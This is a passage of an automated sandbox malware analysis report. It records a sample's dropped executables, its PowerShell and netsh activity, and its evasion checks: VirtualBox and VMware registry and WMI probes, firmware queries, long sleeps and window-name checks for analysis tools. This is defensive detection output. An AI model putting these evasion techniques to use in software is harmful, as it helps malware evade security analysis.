      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\ProgramData\UpSys.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\ProgramData\UpSys.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\ProgramData\UpSys.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\netsh.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\netsh.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX

      Malware Analysis System Evasion:

      barindex
      Query firmware table information (likely to detect VMs)Show sources
      Source: C:\Users\user\Desktop\We7WnoqeXe.exeSystem information queried: FirmwareTableInformationJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\vms.exeSystem information queried: FirmwareTableInformationJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\slhost.exeSystem information queried: FirmwareTableInformationJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\5c436eadc6\rnyuf.exeSystem information queried: FirmwareTableInformationJump to behavior
      Source: C:\ProgramData\MicrosoftNetwork\System.exeSystem information queried: FirmwareTableInformation
      Source: C:\Users\user\AppData\Local\Temp\5c436eadc6\rnyuf.exeSystem information queried: FirmwareTableInformation
      Source: C:\Users\user\AppData\Local\Temp\vms\vms.exeSystem information queried: FirmwareTableInformation
      Tries to detect sandboxes / dynamic malware analysis system (registry check)Show sources
      Source: C:\Users\user\Desktop\We7WnoqeXe.exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__Jump to behavior
      Source: C:\Users\user\AppData\Local\Temp\vms.exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__Jump to behavior
      Source: C:\Users\user\AppData\Local\Temp\slhost.exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__Jump to behavior
      Source: C:\Users\user\AppData\Local\Temp\5c436eadc6\rnyuf.exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__Jump to behavior
      Source: C:\ProgramData\MicrosoftNetwork\System.exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
      Source: C:\Users\user\AppData\Local\Temp\5c436eadc6\rnyuf.exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
      Source: C:\Users\user\AppData\Local\Temp\vms\vms.exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
      Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)Show sources
      Source: C:\Users\user\Desktop\We7WnoqeXe.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
      Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines)Show sources
      Source: C:\Users\user\Desktop\We7WnoqeXe.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_DiskDrive
      Source: C:\Users\user\Desktop\We7WnoqeXe.exe TID: 6164Thread sleep time: -36000s >= -30000sJump to behavior
      Source: C:\Users\user\Desktop\We7WnoqeXe.exe TID: 7104Thread sleep time: -5534023222112862s >= -30000sJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\slhost.exe TID: 6028Thread sleep time: -40000s >= -30000sJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\slhost.exe TID: 6344Thread sleep time: -18000000s >= -30000sJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\5c436eadc6\rnyuf.exe TID: 6708Thread sleep time: -40000s >= -30000sJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\5c436eadc6\rnyuf.exe TID: 6824Thread sleep time: -660000s >= -30000sJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\5c436eadc6\rnyuf.exe TID: 2852Thread sleep count: 122 > 30Jump to behavior
      Source: C:\Users\user\AppData\Local\Temp\5c436eadc6\rnyuf.exe TID: 2852Thread sleep time: -7320000s >= -30000sJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\5c436eadc6\rnyuf.exe TID: 5232Thread sleep count: 129 > 30Jump to behavior
      Source: C:\Users\user\AppData\Local\Temp\5c436eadc6\rnyuf.exe TID: 5232Thread sleep time: -7740000s >= -30000sJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\5c436eadc6\rnyuf.exe TID: 6068Thread sleep time: -900000s >= -30000sJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7052Thread sleep time: -3689348814741908s >= -30000s
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3880Thread sleep time: -2767011611056431s >= -30000s
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3528Thread sleep time: -922337203685477s >= -30000s
      Source: C:\Users\user\AppData\Local\Temp\5c436eadc6\rnyuf.exeLast function: Thread delayed
      Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
      Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
      Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
      Source: C:\Users\user\Desktop\We7WnoqeXe.exeThread delayed: delay time: 922337203685477Jump to behavior
      Source: C:\Users\user\AppData\Local\Temp\slhost.exeThread delayed: delay time: 3600000Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
      Source: C:\Users\user\Desktop\We7WnoqeXe.exeWindow / User API: threadDelayed 3665Jump to behavior
      Source: C:\Users\user\Desktop\We7WnoqeXe.exeWindow / User API: threadDelayed 4546Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5858
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3036
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 6260
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2247
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1353
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 847
      Source: C:\Users\user\Desktop\We7WnoqeXe.exeRegistry key enumerated: More than 149 enums for key HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall
      Source: C:\Users\user\AppData\Local\Temp\vms\vms.exeRegistry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDesc
      Source: C:\Users\user\AppData\Local\Temp\vms\vms.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersion
      Source: C:\Users\user\AppData\Local\Temp\vms\vms.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersion
      Source: C:\Users\user\AppData\Local\Temp\5c436eadc6\rnyuf.exeCode function: 19_2_00CB0D90 sldt word ptr [eax]19_2_00CB0D90
      Source: C:\Users\user\Desktop\We7WnoqeXe.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
      Source: C:\Users\user\Desktop\We7WnoqeXe.exeThread delayed: delay time: 922337203685477Jump to behavior
      Source: C:\Users\user\AppData\Local\Temp\slhost.exeThread delayed: delay time: 3600000Jump to behavior
      Source: C:\Users\user\AppData\Local\Temp\5c436eadc6\rnyuf.exeThread delayed: delay time: 30000Jump to behavior
      Source: C:\Users\user\AppData\Local\Temp\5c436eadc6\rnyuf.exeThread delayed: delay time: 60000Jump to behavior
      Source: C:\Users\user\AppData\Local\Temp\5c436eadc6\rnyuf.exeThread delayed: delay time: 60000Jump to behavior
      Source: C:\Users\user\AppData\Local\Temp\5c436eadc6\rnyuf.exeThread delayed: delay time: 60000Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
      Source: C:\Windows\System32\cmd.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\
      Source: C:\Windows\System32\cmd.exeFile opened: C:\Users\user\AppData\
      Source: C:\Windows\System32\cmd.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\
      Source: C:\Windows\System32\cmd.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\
      Source: C:\Windows\System32\cmd.exeFile opened: C:\Users\user\
      Source: C:\Windows\System32\cmd.exeFile opened: C:\Users\user\AppData\Roaming\
      Source: rnyuf.exe, 00000030.00000002.471168947.0000000001867000.00000004.00000020.sdmpBinary or memory string: HARDWARE\ACPI\DSDT\VBOX__
      Source: We7WnoqeXe.exe, 00000001.00000002.386413604.0000000001888000.00000004.00000020.sdmpBinary or memory string: VMware
      Source: We7WnoqeXe.exe, 00000001.00000002.386413604.0000000001888000.00000004.00000020.sdmpBinary or memory string: Win32_VideoController(Standard display types)VMware82A7L4NXWin32_VideoControllerAGFF_DHPVideoController120060621000000.000000-00060057753display.infMSBDA1YN6B2_YPCI\VEN_15AD&DEV_0405&SUBSYS_040515AD&REV_00\3&61AAA01&0&78OKWin32_ComputerSystemcomputer1280 x 1024 x 4294967296 colorsHVL7O_3P
      Source: UpSys.exe, 0000002B.00000002.470108275.000000000094D000.00000004.00000020.sdmpBinary or memory string: ECr&Prod_VMware_SATA_CD00#5&280b64
      Source: System.exe, 00000021.00000000.529682352.0000027F95A6B000.00000004.00000020.sdmpBinary or memory string: Hyper-V RAW%\System32\fveui.dll,-844
      Source: UpSys.exe, 00000050.00000002.521649533.000000000085E000.00000004.00000020.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\\?\Volume{e6e9dfd8-98f2-11e9-90ce-806e6f6e6963}\
      Source: We7WnoqeXe.exe, 00000001.00000003.263207952.0000000001830000.00000004.00000001.sdmpBinary or memory string: \SystemRoot\system32\ntkrnlm.exeSDT\VBOX__W
      Source: UpSys.exe, 00000050.00000002.521414006.0000000000839000.00000004.00000020.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\b8b}\sh
      Source: slhost.exe, 0000000F.00000002.549136389.000002B9A4D67000.00000004.00000020.sdmp, rnyuf.exe, 00000013.00000003.470176267.0000000001707000.00000004.00000001.sdmp, System.exe, 00000021.00000002.560070469.0000027F95B3E000.00000004.00000020.sdmpBinary or memory string: Hyper-V RAW
      Source: slhost.exe, 0000000F.00000002.547630872.000002B9A4CEB000.00000004.00000020.sdmpBinary or memory string: Hyper-V RAW@q
      Source: netsh.exe, 00000057.00000003.490581305.0000024AEC106000.00000004.00000001.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
      Source: UpSys.exe, 0000003D.00000002.493800841.0000000000969000.00000004.00000020.sdmpBinary or memory string: Prod_VMware_SATA_CD00#5&
      Source: slhost.exe, 0000000F.00000002.547630872.000002B9A4CEB000.00000004.00000020.sdmpBinary or memory string: Hyper-V RAWen-USnM
      Source: We7WnoqeXe.exe, 00000001.00000003.263019173.0000000001830000.00000004.00000001.sdmpBinary or memory string: \SystemRoot\system32\ntkrnlp.exeSDT\VBOX__W
      Source: We7WnoqeXe.exe, 00000001.00000003.263305387.0000000001830000.00000004.00000001.sdmpBinary or memory string: \SystemRoot\system32\ntkrnlmp.exeSDT\VBOX__W
      Source: netsh.exe, 00000031.00000003.452030872.000001CBDBD16000.00000004.00000001.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
      Source: C:\Users\user\Desktop\We7WnoqeXe.exeProcess information queried: ProcessInformationJump to behavior
      Source: C:\Users\user\Desktop\We7WnoqeXe.exeSystem information queried: ModuleInformationJump to behavior

      Anti Debugging:

      barindex
      Tries to detect sandboxes and other dynamic analysis tools (window names)Show sources
      Source: C:\Users\user\AppData\Local\Temp\vms\vms.exeOpen window title or class name: regmonclass
      Source: C:\Users\user\Desktop\We7WnoqeXe.exeOpen window title or class name: gbdyllo
